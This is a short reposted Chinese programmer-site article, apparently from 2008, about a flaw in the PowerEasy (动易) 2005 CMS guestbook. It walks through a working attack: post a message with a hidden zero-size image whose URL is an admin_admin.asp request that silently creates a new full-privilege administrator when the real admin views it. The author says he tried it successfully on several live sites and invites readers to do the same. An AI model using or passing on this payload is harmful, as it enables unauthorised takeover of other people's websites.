欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

通杀动易2005的 XSS 攻击

程序员文章站 2022-06-28 14:06:58
动易2005里面,留言的时候存在一个XSS。 攻击方法如下 : 首先在网站注册一个普通会员,然后去GUESTBOOK留言,在插入图片的时候地址写上(建议在原代码里面把图片的高度与宽度都设... 08-10-08...
动易2005里面,留言的时候存在一个xss。 攻击方法如下 : 首先在网站注册一个普通会员,然后去guestbook留言,在插入图片的时候地址写上(建议在原代码里面把图片的高度与宽度都设置成0,这样在图片前面加上这个连接,基本上就看不见图片了,图片的连接却被管理员解吸执行了): http://localhost/powereasy/admin/admin_admin.asp?adminname=xiaod&username=xiaod&password=123456&pwdconfirm=123456&purview=1&action=saveadd 上面是本地测试地址。 只要你的留言写的足够诱惑,只要管理员一看,就ok了,他回复了你,你就是后台管理员了··· 我自己测试了几个站,结果都成功了,呵呵。大家也可以去测试一下,通杀了 sql 与ac版···